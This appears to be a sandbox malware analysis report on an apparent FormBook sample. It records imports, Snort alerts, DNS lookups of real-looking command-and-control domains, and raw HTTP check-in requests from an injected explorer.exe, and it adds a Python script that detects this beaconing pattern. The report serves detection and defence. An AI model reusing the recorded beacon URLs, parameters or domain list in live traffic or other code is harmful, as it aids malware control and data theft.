KERNEL32.dll  EnumTimeFormatsA, GetProcAddress, LoadLibraryA, VirtualProtect, SetConsoleMode, ReadConsoleInputA, GetProcessHeap, SetEndOfFile, SetEnvironmentVariableA, CompareStringW, CreateFileW, CreateFileA, CreateProcessA, WaitForSingleObject, GetExitCodeProcess, WriteConsoleW, SetStdHandle, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, HeapReAlloc, GetStringTypeW, HeapSize, IsProcessorFeaturePresent, GetCurrentProcessId, GetTickCount, QueryPerformanceCounter, HeapCreate, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameW, GetLocaleInfoW, LoadLibraryW, CloseHandle, ReadFile, GetCurrentThreadId, SetLastError, InterlockedIncrement, InterlockedDecrement, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetLastError, DeleteFileA, GetSystemTimeAsFileTime, GetModuleHandleW, ExitProcess, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, HeapFree, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, HeapAlloc, SetFilePointer, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetFileAttributesA, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree
wsnmp32.dll
WINSPOOL.DRV  PrinterProperties, AddPortW, DeleteFormA, AddPrinterDriverW
OLEAUT32.dll  VarI4FromCy, OleCreatePropertyFrame, VarBstrFromDisp, QueryPathOfRegTypeLib
SHELL32.dll   SHGetPathFromIDList, ExtractIconExA
ODBC32.dll
WS2_32.dll    WSACreateEvent, WSASetServiceW, WSAGetLastError, WSACleanup
RESUTILS.dll  ResUtilGetDwordValue, ResUtilVerifyResourceService, ResUtilFindSzProperty, ResUtilGetMultiSzProperty
WINMM.dll     midiInReset, midiOutOpen, waveOutUnprepareHeader, midiInAddBuffer

Possible Origin

Language of compilation system  Country where language is spoken
English                         United States

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID   Message                                        Source Port  Dest Port  Source IP       Dest IP
11/20/20-11:07:38.645275  ICMP      402   ICMP Destination Unreachable Port Unreachable  -            -          192.168.2.7     8.8.8.8
11/20/20-11:08:16.486833  TCP       1201  ATTACK-RESPONSES 403 Forbidden                 80           49763      34.102.136.180  192.168.2.7

Network Port Distribution

TCP Packets


UDP Packets

                                                                        Nov 20, 2020 11:07:10.355617046 CET53492478.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:10.573728085 CET5228653192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:10.610713959 CET53522868.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:15.370619059 CET5606453192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:15.667937994 CET53560648.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:19.126965046 CET6374453192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:19.164304018 CET53637448.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:21.163629055 CET6145753192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:21.199383020 CET53614578.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:21.464678049 CET5836753192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:21.604794979 CET53583678.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:21.691340923 CET6059953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:21.729232073 CET53605998.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:22.059649944 CET5957153192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:22.095258951 CET53595718.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:22.490994930 CET5268953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:22.526623964 CET53526898.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:23.161501884 CET5029053192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:23.188550949 CET53502908.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:23.994404078 CET6042753192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:24.032332897 CET53604278.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:24.212080002 CET5620953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:24.256122112 CET53562098.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:24.626653910 CET5958253192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:24.662291050 CET53595828.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:25.574372053 CET6094953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:25.610099077 CET53609498.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:26.049972057 CET5854253192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:26.085650921 CET53585428.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:26.373533010 CET5917953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:26.419915915 CET53591798.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:31.892540932 CET6092753192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:31.952383041 CET53609278.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:37.022685051 CET5785453192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:38.007904053 CET5785453192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:38.637741089 CET53578548.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:38.645028114 CET53578548.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:43.998091936 CET6202653192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:44.209893942 CET53620268.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:47.683054924 CET5945353192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:47.718767881 CET53594538.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:49.590164900 CET6246853192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:49.638459921 CET53624688.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:50.345526934 CET5256353192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:50.372570992 CET53525638.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:54.783478975 CET5472153192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:54.842215061 CET53547218.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:00.294127941 CET6282653192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:00.346420050 CET53628268.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:05.605511904 CET6204653192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:05.657974005 CET53620468.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:10.702775002 CET5122353192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:10.896162033 CET53512238.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:11.861721992 CET6390853192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:11.888716936 CET53639088.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:16.285459042 CET4922653192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:16.345438957 CET53492268.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:21.531033039 CET6021253192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:21.683366060 CET53602128.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:26.922692060 CET5886753192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:26.962616920 CET53588678.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:32.013992071 CET5086453192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:32.363317966 CET53508648.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:37.781757116 CET6150453192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:38.542803049 CET53615048.8.8.8192.168.2.7

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Nov 20, 2020 11:07:38.645275116 CET | 192.168.2.7 | 8.8.8.8 | d013 | Port unreachable | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 20, 2020 11:07:09.575184107 CET | 192.168.2.7 | 8.8.8.8 | 0x1206 | Standard query (0) | www.handsfreedocs.com | A (IP address) | IN (0x0001)
Nov 20, 2020 11:07:15.370619059 CET | 192.168.2.7 | 8.8.8.8 | 0x117f | Standard query (0) | www.maninhatphoto.com | A (IP address) | IN (0x0001)
Nov 20, 2020 11:07:21.464678049 CET | 192.168.2.7 | 8.8.8.8 | 0x9c6e | Standard query (0) | www.placeduconfort.com | A (IP address) | IN (0x0001)
Nov 20, 2020 11:07:31.892540932 CET | 192.168.2.7 | 8.8.8.8 | 0xf39d | Standard query (0) | www.heartandcrowncloset.com | A (IP address) | IN (0x0001)
Nov 20, 2020 11:07:37.022685051 CET | 192.168.2.7 | 8.8.8.8 | 0xa3bb | Standard query (0) | www.fahufu.com | A (IP address) | IN (0x0001)
Nov 20, 2020 11:07:38.007904053 CET | 192.168.2.7 | 8.8.8.8 | 0xa3bb | Standard query (0) | www.fahufu.com | A (IP address) | IN (0x0001)
Nov 20, 2020 11:07:43.998091936 CET | 192.168.2.7 | 8.8.8.8 | 0x19a6 | Standard query (0) | www.the-gongs.com | A (IP address) | IN (0x0001)
Nov 20, 2020 11:07:49.590164900 CET | 192.168.2.7 | 8.8.8.8 | 0x3a20 | Standard query (0) | www.shopnicknaks.com | A (IP address) | IN (0x0001)
Nov 20, 2020 11:07:54.783478975 CET | 192.168.2.7 | 8.8.8.8 | 0x3f24 | Standard query (0) | www.sweetbasilmarketing.com | A (IP address) | IN (0x0001)
Nov 20, 2020 11:08:00.294127941 CET | 192.168.2.7 | 8.8.8.8 | 0xc8eb | Standard query (0) | www.justsoldbykristen.com | A (IP address) | IN (0x0001)
Nov 20, 2020 11:08:05.605511904 CET | 192.168.2.7 | 8.8.8.8 | 0x2a2a | Standard query (0) | www.ariasu-nakanokaikei.com | A (IP address) | IN (0x0001)
Nov 20, 2020 11:08:10.702775002 CET | 192.168.2.7 | 8.8.8.8 | 0x9a72 | Standard query (0) | www.realitytvstockwatch.com | A (IP address) | IN (0x0001)
Nov 20, 2020 11:08:16.285459042 CET | 192.168.2.7 | 8.8.8.8 | 0x6cbb | Standard query (0) | www.searchnehomes.com | A (IP address) | IN (0x0001)
Nov 20, 2020 11:08:21.531033039 CET | 192.168.2.7 | 8.8.8.8 | 0xa56c | Standard query (0) | www.happinestbuilders.com | A (IP address) | IN (0x0001)
Nov 20, 2020 11:08:26.922692060 CET | 192.168.2.7 | 8.8.8.8 | 0xbf40 | Standard query (0) | www.hemparcade.com | A (IP address) | IN (0x0001)
Nov 20, 2020 11:08:32.013992071 CET | 192.168.2.7 | 8.8.8.8 | 0xca10 | Standard query (0) | www.lotoencasa.com | A (IP address) | IN (0x0001)
Nov 20, 2020 11:08:37.781757116 CET | 192.168.2.7 | 8.8.8.8 | 0xa179 | Standard query (0) | www.handsfreedocs.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 20, 2020 11:07:10.355617046 CET | 8.8.8.8 | 192.168.2.7 | 0x1206 | Server failure (2) | www.handsfreedocs.com | none | none | A (IP address) | IN (0x0001)
Nov 20, 2020 11:07:15.667937994 CET | 8.8.8.8 | 192.168.2.7 | 0x117f | No error (0) | www.maninhatphoto.com | | 154.86.218.70 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:07:21.604794979 CET | 8.8.8.8 | 192.168.2.7 | 0x9c6e | No error (0) | www.placeduconfort.com | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 11:07:21.604794979 CET | 8.8.8.8 | 192.168.2.7 | 0x9c6e | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 3.12.202.18 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:07:21.604794979 CET | 8.8.8.8 | 192.168.2.7 | 0x9c6e | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 3.134.22.63 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:07:21.604794979 CET | 8.8.8.8 | 192.168.2.7 | 0x9c6e | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 3.138.72.189 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:07:31.952383041 CET | 8.8.8.8 | 192.168.2.7 | 0xf39d | No error (0) | www.heartandcrowncloset.com | heartandcrowncloset.com | | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 11:07:31.952383041 CET | 8.8.8.8 | 192.168.2.7 | 0xf39d | No error (0) | heartandcrowncloset.com | | 160.153.136.3 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:07:38.637741089 CET | 8.8.8.8 | 192.168.2.7 | 0xa3bb | No error (0) | www.fahufu.com | fahufu.com | | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 11:07:38.637741089 CET | 8.8.8.8 | 192.168.2.7 | 0xa3bb | No error (0) | fahufu.com | | 194.35.122.226 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:07:38.645028114 CET | 8.8.8.8 | 192.168.2.7 | 0xa3bb | No error (0) | www.fahufu.com | fahufu.com | | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 11:07:38.645028114 CET | 8.8.8.8 | 192.168.2.7 | 0xa3bb | No error (0) | fahufu.com | | 194.35.122.226 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:07:44.209893942 CET | 8.8.8.8 | 192.168.2.7 | 0x19a6 | No error (0) | www.the-gongs.com | | 104.253.79.71 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:07:49.638459921 CET | 8.8.8.8 | 192.168.2.7 | 0x3a20 | No error (0) | www.shopnicknaks.com | www188.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 11:07:49.638459921 CET | 8.8.8.8 | 192.168.2.7 | 0x3a20 | No error (0) | www188.wixdns.net | balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 11:07:49.638459921 CET | 8.8.8.8 | 192.168.2.7 | 0x3a20 | No error (0) | balancer.wixdns.net | 5f36b111-balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 11:07:49.638459921 CET | 8.8.8.8 | 192.168.2.7 | 0x3a20 | No error (0) | 5f36b111-balancer.wixdns.net | td-balancer-euw2-6-109.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 11:07:49.638459921 CET | 8.8.8.8 | 192.168.2.7 | 0x3a20 | No error (0) | td-balancer-euw2-6-109.wixdns.net | | 35.246.6.109 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:07:54.842215061 CET | 8.8.8.8 | 192.168.2.7 | 0x3f24 | No error (0) | www.sweetbasilmarketing.com | sweetbasilmarketing.com | | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 11:07:54.842215061 CET | 8.8.8.8 | 192.168.2.7 | 0x3f24 | No error (0) | sweetbasilmarketing.com | | 185.201.11.126 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:08:00.346420050 CET | 8.8.8.8 | 192.168.2.7 | 0xc8eb | No error (0) | www.justsoldbykristen.com | | 52.71.133.130 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:08:05.657974005 CET | 8.8.8.8 | 192.168.2.7 | 0x2a2a | No error (0) | www.ariasu-nakanokaikei.com | | 13.226.173.80 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:08:05.657974005 CET | 8.8.8.8 | 192.168.2.7 | 0x2a2a | No error (0) | www.ariasu-nakanokaikei.com | | 13.226.173.83 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:08:05.657974005 CET | 8.8.8.8 | 192.168.2.7 | 0x2a2a | No error (0) | www.ariasu-nakanokaikei.com | | 13.226.173.107 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:08:05.657974005 CET | 8.8.8.8 | 192.168.2.7 | 0x2a2a | No error (0) | www.ariasu-nakanokaikei.com | | 13.226.173.49 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:08:10.896162033 CET | 8.8.8.8 | 192.168.2.7 | 0x9a72 | No error (0) | www.realitytvstockwatch.com | | 103.224.182.242 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:08:16.345438957 CET | 8.8.8.8 | 192.168.2.7 | 0x6cbb | No error (0) | www.searchnehomes.com | searchnehomes.com | | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 11:08:16.345438957 CET | 8.8.8.8 | 192.168.2.7 | 0x6cbb | No error (0) | searchnehomes.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:08:21.683366060 CET | 8.8.8.8 | 192.168.2.7 | 0xa56c | No error (0) | www.happinestbuilders.com | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 11:08:21.683366060 CET | 8.8.8.8 | 192.168.2.7 | 0xa56c | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 3.134.22.63 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:08:21.683366060 CET | 8.8.8.8 | 192.168.2.7 | 0xa56c | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 3.12.202.18 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:08:21.683366060 CET | 8.8.8.8 | 192.168.2.7 | 0xa56c | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 3.138.72.189 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:08:26.962616920 CET | 8.8.8.8 | 192.168.2.7 | 0xbf40 | No error (0) | www.hemparcade.com | | 52.58.78.16 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:08:32.363317966 CET | 8.8.8.8 | 192.168.2.7 | 0xca10 | No error (0) | www.lotoencasa.com | | 192.155.168.14 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:08:38.542803049 CET | 8.8.8.8 | 192.168.2.7 | 0xa179 | Server failure (2) | www.handsfreedocs.com | none | none | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.maninhatphoto.com
• www.placeduconfort.com
• www.heartandcrowncloset.com
• www.fahufu.com
• www.the-gongs.com
• www.shopnicknaks.com
• www.sweetbasilmarketing.com
• www.justsoldbykristen.com
• www.ariasu-nakanokaikei.com
• www.realitytvstockwatch.com
• www.searchnehomes.com
• www.happinestbuilders.com
• www.hemparcade.com
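The DNS Queries table and the HTTP sessions below record the check-in behaviour of this sample: roughly every five seconds the injected explorer.exe resolves the next www.* host from its list, and to each host that resolves it sends the same GET /igqu/?7nExDDz=...&znedzJ=zZ08lr template, with the long parameter changing per host and the short one fixed. The script below is an added example, not part of the Joe Sandbox report and not code from the sample; it transcribes the timestamps, names and request lines shown on this page into inline records (timestamps cut to microseconds) and flags the two shapes a detection engineer would key on. The threshold values (minimum distinct hosts, cadence window, minimum hosts per URI template) are assumptions chosen for illustration, not FormBook constants.

```python
import statistics
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

TS_FMT = "%Y-%m-%d %H:%M:%S.%f"

# Transcribed from the DNS Queries table on this page (the retransmitted
# 0xa3bb query for www.fahufu.com is listed once).
DNS_QUERIES = """\
2020-11-20 11:07:09.575184 www.handsfreedocs.com
2020-11-20 11:07:15.370619 www.maninhatphoto.com
2020-11-20 11:07:21.464678 www.placeduconfort.com
2020-11-20 11:07:31.892540 www.heartandcrowncloset.com
2020-11-20 11:07:37.022685 www.fahufu.com
2020-11-20 11:07:43.998091 www.the-gongs.com
2020-11-20 11:07:49.590164 www.shopnicknaks.com
2020-11-20 11:07:54.783478 www.sweetbasilmarketing.com
2020-11-20 11:08:00.294127 www.justsoldbykristen.com
2020-11-20 11:08:05.605511 www.ariasu-nakanokaikei.com
2020-11-20 11:08:10.702775 www.realitytvstockwatch.com
2020-11-20 11:08:16.285459 www.searchnehomes.com
2020-11-20 11:08:21.531033 www.happinestbuilders.com
2020-11-20 11:08:26.922692 www.hemparcade.com
2020-11-20 11:08:32.013992 www.lotoencasa.com
2020-11-20 11:08:37.781757 www.handsfreedocs.com
"""

# Transcribed from the three HTTP sessions shown in the HTTP Packets table.
HTTP_REQUESTS = """\
2020-11-20 11:07:15.932311 www.maninhatphoto.com GET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr
2020-11-20 11:07:21.718597 www.placeduconfort.com GET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr
2020-11-20 11:08:16.363661 www.searchnehomes.com GET /igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr
"""


def parse_dns(text):
    """Return [(datetime, qname)] from 'date time qname' lines."""
    rows = []
    for line in filter(None, text.splitlines()):
        date, clock, qname = line.split()
        rows.append((datetime.strptime(f"{date} {clock}", TS_FMT), qname))
    return rows


def parse_http(text):
    """Return [(datetime, host, method, path, params)] from request lines."""
    rows = []
    for line in filter(None, text.splitlines()):
        date, clock, host, method, target = line.split()
        url = urlsplit(target)
        params = parse_qs(url.query, keep_blank_values=True)
        rows.append((datetime.strptime(f"{date} {clock}", TS_FMT),
                     host, method, url.path, params))
    return rows


def dns_rotation(queries, min_hosts=8, min_gap=3.0, max_gap=10.0):
    """Many distinct hosts resolved at a near-constant cadence is the shape
    of a bot walking an embedded domain list. The thresholds are assumptions
    chosen for this example, not constants taken from the malware."""
    times = [t for t, _ in queries]
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    hosts = {name for _, name in queries}
    median = statistics.median(gaps) if gaps else 0.0
    return {
        "distinct_hosts": len(hosts),
        "median_gap_s": round(median, 3),
        "suspicious": len(hosts) >= min_hosts and min_gap <= median <= max_gap,
    }


def http_template_groups(requests, min_hosts=3):
    """Group GETs by (path, sorted parameter names, value of the shortest
    parameter) and keep groups spanning several unrelated hosts: one URI
    template with a fixed short tail sent to different domains."""
    groups = {}
    for _, host, method, path, params in requests:
        if method != "GET" or not params:
            continue
        names = tuple(sorted(params))
        shortest = min(names, key=lambda n: len(params[n][0]))
        key = (path, names, params[shortest][0])
        groups.setdefault(key, set()).add(host)
    return {k: sorted(v) for k, v in groups.items() if len(v) >= min_hosts}


def report():
    """Run both checks over the embedded records."""
    return (dns_rotation(parse_dns(DNS_QUERIES)),
            http_template_groups(parse_http(HTTP_REQUESTS)))


if __name__ == "__main__":
    dns, groups = report()
    print("DNS rotation:", dns)
    for (path, names, tail), hosts in groups.items():
        print(f"shared template {path} params={names} tail={tail!r} -> {hosts}")
```

Run against the page's own records, the DNS check reports 15 distinct hosts at a median gap of about 5.5 s, and the HTTP check collapses the three sessions into a single template keyed on /igqu/, the parameter pair 7nExDDz/znedzJ and the tail zZ08lr. Grouping on the short parameter rather than the long one is deliberate: the long value is per-host, the short one is what stays constant across the list, so it is the better pivot for hunting other infections of the same build in proxy logs.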

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49734 | 154.86.218.70 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 11:07:15.932311058 CET | 448 | OUT | GET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr HTTP/1.1
Host: www.maninhatphoto.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 20, 2020 11:07:16.187412977 CET | 450 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2020 10:07:16 GMT
Content-Type: text/html
Content-Length: 9558
Connection: close
Vary: Accept-Encoding
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 09 3c 74 69 74 6c 65 3e 26 23 32 30 31 32 32 3b 26 23 32 31 33 33 38 3b 26 23 32 32 32 36 39 3b 26 23 33 38 34 36 39 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 47 42 4b 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 69 74 65 61 70 70 22 20 2f 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 74 72 61 6e 73 66 6f 72 6d 22 20 2f 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 62 6c 65 2d 64 65 76 69 63 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 63 2c 6d 6f 62 69 6c 65 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0d 0a 09 09 3c 73 74 79 6c 65 3e 0d 0a 09 09 09 62 6f 64 79 20 7b 0d 0a 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 45 36 45 41 45 42 3b 0d 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 27 ce a2 c8 ed d1 c5 ba da 27 2c 20 27 cb ce cc e5 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 0d 0a 7d 0d 0a 61 7b 0d 0a 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 20 23 37 42 37 42 37 42 3b 0d 0a 7d 0d 0a 0d 0a 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 31 30 30 70 78 29 20 7b 0d 0a 09 2e 61 6c 65 72 74 2d 62 6f 78 20 7b 0d 0a 09 64 69 73 
70 6c 61 79 3a 20 6e 6f 6e 65 3b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 09 6d 61 72 67 69 6e 3a 20 39 36 70 78 20 61 75 74 6f 20 30 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 20 31 38 30 70 78 20 38 35 70 78 20 32 32 70 78 3b 0d 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 70 78 20 31 30 70 78 20 30 20 30 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 46 46 3b 0d 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 35 70 78 20 39 70 78 20 31 37 70 78 20 72 67 62 61 28 31 30 32 2c 31 30 32 2c 31 30 32 2c 30 2e 37 35 29 3b 0d 0a 09 77 69 64 74 68 3a 20 32 38 36 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 46 46 46 3b 0d 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 0d 0a 09 7d 0d 0a 09 2e 61 6c 65 72 74 2d 62 6f 78 20 70 20 7b 0d 0a 09 6d 61 72 67 69 6e 3a 20 30 0d 0a 09 7d 0d 0a 09 2e 61 6c 65 72 74 2d 63 69 72 63 6c 65 20 7b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 09 74 6f 70 3a 20 2d 35 30 70 78 3b 0d 0a 09 6c 65 66 74 3a 20 31 31 31 70 78 0d 0a 09 7d 0d 0a 09 2e 61 6c 65 72 74 2d 73 65 63 2d 63 69 72 63 6c 65 20 7b 0d 0a 09 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 30 3b 0d 0a 09 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 37 33 35 3b 0d 0a 09 74 72 61 6e 73 69 74 69 6f 